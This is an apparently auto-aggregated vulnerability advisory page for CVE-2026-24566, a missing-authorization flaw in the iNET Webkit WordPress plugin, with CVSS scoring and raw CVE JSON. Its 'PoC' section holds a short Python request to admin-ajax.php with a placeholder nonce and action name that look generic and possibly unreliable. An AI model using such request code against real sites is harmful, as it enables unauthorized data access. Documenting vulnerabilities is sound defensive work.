Security Vulnerability Report
中文
CVE-2026-24566 CVSS 6.5 MEDIUM

CVE-2026-24566

Published: 2026-01-23 15:16:14
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in iNET iNET Webkit inet-webkit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects iNET Webkit: from n/a through <= 1.2.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

1.2.4及以下版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests url = 'http://target.com/wp-admin/admin-ajax.php' data = { 'action': 'inet_webkit_action', 'nonce': 'attacker_obtained_nonce', 'user_id': 1 # 目标用户ID } response = requests.post(url, data=data) print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24566", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:14.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in iNET iNET Webkit inet-webkit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects iNET Webkit: from n/a through <= 1.2.4."}, {"lang": "es", "value": "Vulnerabilidad por autorización faltante en iNET iNET Webkit inet-webkit permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a iNET Webkit: desde n/a hasta &lt;= 1.2.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/inet-webkit/vulnerability/wordpress-inet-webkit-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}